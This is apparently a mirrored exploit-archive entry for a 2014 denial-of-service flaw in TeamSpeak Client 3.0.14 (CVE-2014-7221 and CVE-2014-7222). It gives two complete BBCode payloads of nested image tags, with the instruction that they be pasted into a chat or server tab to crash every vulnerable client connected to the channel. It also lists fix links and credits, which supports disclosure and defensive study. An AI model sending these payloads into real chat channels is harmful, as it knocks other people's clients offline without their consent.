Skip to content
cyberexploits
doswindowstext

TeamSpeak Client 3.0.14 - Buffer Overflow

TeamSpeak Client 3.0.14 - Buffer Overflow

Publié le 2014-10-02

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/windows/dos/34857.txt7eac4c3a
raw
#################################################################################################

#

# Title                   : TeamSpeak Client v3.0.14 - Buffer Overflow Vulnerability

# Severity                : High+/Critical

# Reporter(s)             : SpyEye & Christian Galeone

# Software Version        : 3.0.14 & Previous Versions

# Software Name           : TeamSpeak Client

# Software Download Link  : http://letoltes.szoftverbazis.hu/IbAi1W2OLVclvRLS2KUGHw/1410984789/teamspeak-3014/TeamSpeak3-Client-win64-3.0.14.exe

# Vendor Home             : http://teamspeak.com/

# Date(s)                 : 01/04/2014 - 0r161n4l c0d3 By SpyEye

#                         : 21/05/2014 - v4r14n7 c0d3 By Christian Galeone

# Tested in               : Win7 - TeamSpeak Client V3.0.14

# CVE(s)                  : CVE-2014-7221 By SpyEye & CVE-2014-7222 By Christian Galeone

#

##################################################################################################

# 

# Effects:

# 

# Mass Crash Client (You & The User(s) Connected With A Vulnerable Version Into YOUR Channel)

# 

# Note:

#

# The Following Code MUST Be Sent Into The Chat/Server Tab For A Channel/Server Crash Effect. 

#

# PoC:

#  

#  1) Buffer Overflow Vulnerability - # 0r161n4l c0d3 n.1 # By SpyEye

#

#  CVE: CVE-2014-7221

#

# [img][img]//http://www.teamspeak.com/templates/teamspeak_v3/images/blank.gif[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7a.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7b.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.24[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7z.png?ver=4.6.0.28[/img][/img]

# 

#  2) Buffer Overflow Vulnerability - # v4r14n7 c0d3 n.2 # By Christian Galeone

#

#  CVE: CVE-2014-7222

# 

# [img][img]\\1\z[/img][/img][img][img]\\2\z[/img][/img][img][img]\\3\z[/img][/img][img][img]\\4\z[/img][/img][img][img]\\5\z[/img][/img][img][img]\\6\z[/img][/img][img][img]\\7\z[/img][/img][img][img]\\8\z[/img][/img][img][img]\\9\z[/img][/img][img][img]\\10\z[/img][/img][img][img]\\11\z[/img][/img][img][img]\\12\z[/img][/img][img][img]\\13\z[/img][/img][img][img]\\14\z[/img][/img][img][img]\\15\z[/img][/img][img][img]\\16\z[/img][/img][img][img]\\17\z[/img][/img][img][img]\\18\z[/img][/img][img][img]\\1\z[/img][/img][img][img]\\2\z[/img][/img][img][img]\\3\z[/img][/img][img][img]\\4\z[/img][/img][img][img]\\5\z[/img][/img][img][img]\\6\z[/img][/img][img][img]\\7\z[/img][/img][img][img]\\8\z[/img][/img][img][img]\\9\z[/img][/img][img][img]\\10\z[/img][/img][img][img]\\11\z[/img][/img][img][img]\\12\z[/img][/img][img][img]\\13\z[/img][/img]

# 

# Fix:

#

# http://screech.me/ts3/plugins/antifreeze.html

#

#                    OR

#

# http://www.teamspeak.com/?page=downloads

#

# Original Source:

#

# http://r4p3.net/public/ts3bbcodefreeze.txt

#

# http://r4p3.net/forum/reverse-engineering/38/teamspeak-3-exploit-bb-code-freeze-crash-not-responding/905/

#

# Credit(s):

#

# SpyEye (http://forum.teamspeak.com/member.php/263635-SpyEye) - 0r161n4l 3xpl017 d3v3l0p3r

#

# Christian Galeone - V4r14n7 3xpl017 d3v3l0p3r

#

#

##################################################################################################
Voir sur GitHub